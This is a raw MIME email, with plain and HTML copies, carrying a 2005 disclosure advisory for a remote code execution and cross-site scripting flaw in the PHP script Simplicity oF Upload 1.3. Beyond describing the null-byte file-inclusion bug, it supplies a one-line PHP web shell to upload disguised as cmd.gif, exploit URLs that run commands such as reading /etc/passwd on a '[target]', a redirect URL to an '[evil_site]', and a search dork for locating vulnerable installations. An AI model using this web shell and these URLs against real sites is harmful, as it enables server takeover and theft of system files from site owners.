--------------Boundary-00=_B6O8YHI1VA4000000000
Content-Type: Text/Plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

26/07/2005 16.09.18=0D
=0D
Simplicity OF Upload 1.3 (possibly prior versons) remote code execution =0D
& cross site scripting=0D
=0D
software: =0D
author site: http://www.phpsimplicity.com/scripts.php?id=3D3=0D
=0D
=0D
remote commands execution:=0D
=0D
problem at line 25-30: =0D
=2E..=0D
//check for language overriding..=0D
if (isset($_GET['language']))=0D
   $language =3D strtolower($_GET['language']);=0D
=0D
//now we include the language file=0D
require_once("$language.lng");=0D
=2E..=0D
=0D
you can include whatever adding a null byte to "language" parameter value=
:=0D
=0D
example:=0D
http://localhost:30/simply/download.php?language=3Dupload.php%00=0D
=0D
you will see upload & download page together :)=0D
=0D
so you can upload a cmd.gif (when you upload a .php file, usually it is=0D
renamed to .html...)  file with this php code inside to execute=0D
commands:=0D
=0D
<?php=0D
=0D
system($HTTP_GET_VARS[command]);=0D
=0D
?>=0D
=0D
then try this url:=0D
=0D
http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dls=0D
=0D
to list directories=0D
=0D
http://[target]/[path]/download.php?language=3Dcmd
gif%00&command=3Dcat%20/etc/passwd=0D
=0D
to show /etc/passwd file=0D
=0D
cross site scripting:=0D
=0D
also, a remote user can supply a specially crafted URL to redirect other
people=0D
to an evil page:=0D
=0D
http://[target]/[path]/download
php?language=3Dhttp://[evil_site]/[evil_page]%00=0D
=0D
=0D
=0D
googledork:=0D
=0D
"Powered By: Simplicity oF Upload"=0D
=0D
=0D
rgod=0D
email: rgod[at]autistici.org=0D
site: http://rgod.altervista.org=0D
original advisory: http://rgod.altervista.org/simply.html
--------------Boundary-00=_B6O8YHI1VA4000000000
Content-Type: Text/HTML;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-=
1">
<META content=3D"IncrediMail 1.0" name=3DGENERATOR>
<!--IncrdiXMLRemarkStart>
<IncrdiX-Info>
<X-FID>FLAVOR00-NONE-0000-0000-000000000000</X-FID>
<X-FVER>4.0</X-FVER>
<X-CNT>;</X-CNT>
</IncrdiX-Info>
<IncrdiXMLRemarkEnd-->
</HEAD>
<BODY style=3D"BACKGROUND-POSITION: 0px 0px; FONT-SIZE: 12pt; MARGIN: 5px=
 10px 10px; FONT-FAMILY: Arial" bgColor=3D#ffffff background=3D"" scroll=3D=
yes ORGYPOS=3D"0">
<TABLE id=3DINCREDIMAINTABLE cellSpacing=3D0 cellPadding=3D2 width=3D"100=
%" border=3D0>
<TBODY>
<TR>
<TD id=3DINCREDITEXTREGION style=3D"FONT-SIZE: 12pt; CURSOR: auto; FONT-F=
AMILY: Arial" width=3D"100%"><PRE><CODE><SPAN style=3D"FONT: 10pt Courier=
 New"><SPAN class=3Dgeneral1-number>26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versons) remote code execution=20
&amp; cross site scripting

software:=20
author site: http://www.phpsimplicity.com/scripts.php?id=3D3


remote commands execution:

problem at line 25-30:=20
=2E..
//check for language overriding..
if (isset($_GET['language']))
   $language =3D strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
=2E..

you can include whatever adding a null byte to "language" parameter value=
:

example:
http://localhost:30/simply/download.php?language=3Dupload.php%00

you will see upload &amp; download page together :)

so you can upload a cmd.gif (when you upload a .php file, usually it is
renamed to .html...)  file with this php code inside to execute
commands:

&lt;?php

system($HTTP_GET_VARS[command]);

?&gt;

then try this url:

http://[target]/[path]/download.php?language=3Dcmd.gif%00&amp;command=3Dl=
s

to list directories

http://[target]/[path]/download.php?language=3Dcmd.gif%00&amp;command=3Dc=
at%20/etc/passwd

to show /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other =
people
to an evil page:

http://[target]/[path]/download.php?language=3Dhttp://[evil_site]/[evil_p=
age]%00



googledork:

"Powered By: Simplicity oF Upload"


rgod
email: rgod[at]autistici.org
site: <A href=3D"http://rgod.altervista.orgoriginal">http://rgod.altervis=
ta.org
</SPAN></SPAN>original</A> advisory: <A href=3D"http://rgod.altervista.or=
g/simply.html">http://rgod.altervista.org/simply.html</A>
</CODE></PRE></TD></TR>
<TR>
<TD id=3DINCREDIFOOTER width=3D"100%">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD width=3D"100%"></TD>
<TD id=3DINCREDISOUND vAlign=3Dbottom align=3Dmiddle></TD>
<TD id=3DINCREDIANIM vAlign=3Dbottom align=3Dmiddle></TD></TR></TBODY></T=
ABLE></TD></TR></TBODY></TABLE><SPAN id=3DIncrediStamp><SPAN dir=3Dltr><A=
 title=3D"Add FUN to your email - CLICK HERE!" style=3D"TEXT-DECORATION: =
none" href=3D"http://www.incredimail.com/index.asp?id=3D96322"><FONT styl=
e=3D"COLOR: black" face=3D"Arial, Helvetica, sans-serif" size=3D2>_______=
______________________________________________________________<BR>&nbsp;<=
B>FREE Emoticons for your email! </FONT><FONT face=3D"Arial, Helvetica, s=
ans-serif" size=3D2><U>Click Here!</U></B>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</FONT><BR=
><IMG hspace=3D0 src=3D"http://www2.incredimail.com/contents/stamps/imstp=
_7_05_10.gif" align=3Dbaseline border=3D0></A></SPAN></SPAN></BODY></HTML=
>
--------------Boundary-00=_B6O8YHI1VA4000000000--